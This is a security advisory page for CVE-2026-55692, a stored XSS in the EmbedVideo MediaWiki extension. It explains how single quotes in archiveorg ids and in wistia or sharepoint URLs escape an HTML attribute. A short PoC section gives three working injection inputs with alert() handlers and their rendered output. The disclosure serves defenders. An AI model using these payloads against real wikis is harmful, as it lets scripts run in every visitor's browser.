GHSA-5c7p-g73q-rpg5

Suggest an improvement
Source
https://github.com/advisories/GHSA-5c7p-g73q-rpg5
Import Source
https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/06/GHSA-5c7p-g73q-rpg5/GHSA-5c7p-g73q-rpg5.json
JSON Data
https://api.osv.dev/v1/vulns/GHSA-5c7p-g73q-rpg5
Aliases
  • CVE-2026-55692
Published
2026-06-19T21:41:57Z
Modified
2026-06-19T21:45:19.324172668Z
Severity
  • 7.5 (High) CVSS_V3 - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N CVSS Calculator
Summary
StarCitizenWiki Extension Embed Video: Stored XSS via malformed src url with $wgEmbedVideoRequireConsent enabled
Details

Summary

With $wgEmbedVideoRequireConsent enabled (the default), the urls for videos are stored in a json-ified data attributedata-mw-iframeconfig. When given a malformed url or id, the data-mw-iframeconfig attribute can be escaped via single quotes, allowing for html/javascript injection.

Details

The sprintf here adds the iframe config encoded as JSON here. When given a malicious url or id with a single quote, the $this->getUrl() call returns an unescaped payload that terminates the data-mw-iframeconfig attribute and allows for injecting attributes, including handlers, into the figure element. The id regex for the archiveorg service and the url regexes for the wistia and sharepoint services allow for single quotes to be introduced.

PoC

A couple of examples across services

Input:
<embedvideo service="archiveorg" id="x' onmouseover='alert(document.domain)' data-x='"></embedvideo>

Renders:


<figure class="embedvideo" data-service="archiveorg" data-mw-iframeconfig="{&quot;src&quot;:&quot;//archive.org/embed/x" onmouseover="alert(document.domain)" data-x="?autoplay=1&quot;}" style="width:640px">
<div class="embedvideo-wrapper" style="height:493px"><div class="embedvideo-consent" data-show-privacy-notice="1">
...
</div>
</figure>


Input:
{{#ev:wistia|https://wistia.com/medias/x'onmouseover='alert(document.domain)'}}

Renders:


<figure class="embedvideo" data-service="wistia" data-mw-iframeconfig="{&quot;src&quot;:&quot;//fast.wistia.net/embed/iframe/x" onmouseover="alert(document.domain)" ?autoplay="1&quot;}'" style="width:640px">
<div class="embedvideo-wrapper" style="height:360px"><div class="embedvideo-consent" data-show-privacy-notice="1">
...
</div>
</figure>


{{#ev:sharepoint|https://a.sharepoint.com/sites/x'onmouseover='alert(document.domain)'.aspx}}

Impact

Under the default $wgEmbedVideoRequireConsent = true configuration, any user able to edit a page can inject arbitrary JavaScript into an HTML event handler attribute (e.g. onfocus) via parameter. It requires no interaction (autofires via autofocus) and executes in the wiki origin for every visitor to the page.

Database specific 
{
    "nvd_published_at": null,
    "github_reviewed_at": "2026-06-19T21:41:57Z",
    "github_reviewed": true,
    "severity": "HIGH",
    "cwe_ids": [
        "CWE-79",
        "CWE-80"
    ]
}
References

Affected packages

Packagist / starcitizenwiki/embedvideo

Package

Name
starcitizenwiki/embedvideo
Purl
pkg:composer/starcitizenwiki%2Fembedvideo

Affected ranges

Type
ECOSYSTEM
Events
Introduced
0Unknown introduced version / All previous versions are affected
Fixed
4.1.0

Affected versions

3.*
3.0.0
3.0.1
3.0.2
3.0.3
3.0.4
3.0.5
3.0.6
3.0.7
3.0.8
3.0.9
3.1.0
3.2.0
3.2.1
3.2.2
3.2.3
3.2.4
3.2.5
3.2.6
3.2.7
3.2.8
3.3.0
3.4.0
3.4.1
3.4.2
3.4.3
4.*
4.0.0

Database specific

source 
"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/06/GHSA-5c7p-g73q-rpg5/GHSA-5c7p-g73q-rpg5.json"
last_known_affected_version_range 
"<= 4.0.0"